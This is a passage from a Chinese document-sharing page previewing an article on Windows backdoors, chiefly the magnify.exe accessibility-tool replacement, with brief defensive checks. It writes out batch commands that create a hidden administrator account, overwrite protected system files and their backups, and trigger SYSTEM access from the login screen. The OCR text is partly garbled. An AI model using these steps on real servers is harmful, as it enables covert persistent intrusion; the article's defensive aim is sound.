返回
windows后门技术解析和防范

windows后门技术解析和防范

ID:34318666

大小:63.26 KB

页数:7页

时间:2019-03-05

windows后门技术解析和防范_第1页
windows后门技术解析和防范_第2页
windows后门技术解析和防范_第3页
windows后门技术解析和防范_第4页
windows后门技术解析和防范_第5页
资源描述:

《windows后门技术解析和防范》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、Windows后门技术解析和防范从某种意义上说,服务器被攻击是不可避免的,甚至被控制也情有可原。但绝对不能容忍的是,服务器被植入后门,攻击者如入无人之境,而管理者去浑然不觉。木文将对当前比较流行的后门技术进行解析,知己知彼方能杜绝后门。1放大镜后门放大镜(magnify.exe)是Windows2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win+LT组合键调用该工具,因此攻击者就用精心构造的magnify.exe同名文件替换放大镜程序,从而达到控制服务器的目的。通常情况下,攻击者

2、通过构造的magnify.exe程序创建一个管理员用户,然后登录系统。当然有的时候他们也会通过其育•接调用命令提示符(cmd.exe)或者系统shell(explorer.exe)o需要说明的是,这样调用的程序都是system权限,即系统最高权限。不过,以防万一当管理员在运行放大镜程序时发现破绽,攻击者一般通过该构造程序完成所需的操作后,最后会运行真正的放大镜程序,以蒙骗管理员。其利用的方法是:(1)构造批处理脚木@echooffnetusergslw$test168/addnetlocalgroupadministratorsgslw$

3、/add%Windir%system32agnify.exeexit将上面的脚木保存为magnify.bat,其作用是创建一个密码为test168的管理员用户gslwS,最后运行改名后的放大镜程序nagnify.exeo(2)文件格式转换因为批处理文件magnify.bat的后缀是bat,必须要将其转换为同名的exe文件才可以通过组合键Win+U调用。攻击者一般可以利用WinRar构造一个自动解压的exe压缩文件,当然也可以利用bat2com>com2exe进行文件格式的转换。我们就以后面的方法为例进行演示。打开命令行,进入bat2

4、com、com2exeT具所在的目录,然后运行命令“bat2commagnify.bat"将magnify.bat转换成magnify.com,继续运行命令“com2exemagnify.com"将magnify.com转换成magnify.exe,这样就把批处理文件转换成和放大镜程序同名的程序文件。(3)放大镜文件替换下面就需要用构造的magnify.exe替换同名的放大镜程序文件,由于Windows对系统文件的自我保护,因此不能直接替换,不过Windows提供了一个命令replace.exe,通过它我们可以替换系统文件。另外,由于系统

5、文件在%Windir%system32dllcache中有备份,为了防止文件替换后又重新还原,所有我们首先要替换该目录下的magnify.exe文件。假设构造的magnify.exe文件在%Windir%目录下,我们可以通过一个批处理即可实现文件的替换。@echooffcopy%Windir%system32dllcachemagnify.exenagnify.execopy%Windir%system32magnify.exenagnify.exereplace.exe%Windir%magnify.exe%Windir

6、%system32dllcachereplace.exe%Windir%magnify.exe%Windir%system32exit上而批处理的功能是,首先将放大镜程序备份为nagnify.exe,然后用同名的构造程序将其替换。(4)攻击利用当完成上述操作后,一个放大镜后门就做成了。然后攻击者通过远程桌而连接服务器,在登录界面窗口撼下本地键盘的“Win+U”组合键,选择运行其中的“放大镜”,此刻就在服务器上创建了一个管理员用户gslw$并打开了放大镜工具,然后攻击者就开业通过该帐户登录服务器。当然,攻击者在断开登录前会删除所有与

7、该帐户相关的信息,以防被管理员发现。(5)防范措施进入%Windir%systcm32查看magnify.exe的文件图标是否是原来的放大镜的图标,如果不是的话极有可能被植入了放大镜后门。当然,有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。此时我们可以查看magnify.exe文件的大小和修改时间,如果这两样有一项不符就比较怀疑了。我们也可以先运行magnify.exe,然后运行lusrmgr.msc查看是否有可疑的用户。如果确定服务器被放置了放大镜后门,首先要删除该文件,然后恢复止常的放大镜程序。当然,我们也可以做得

8、更彻底一些,用一个无关紧要的程序替换放大镜程序。补充:与放大镜后门类似的述有“粘滞键”后门,即按下SHIEF键五次可以启动粘滞键功能,其利用和防范措施与放大镜后门类似,只是将magnify.e

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。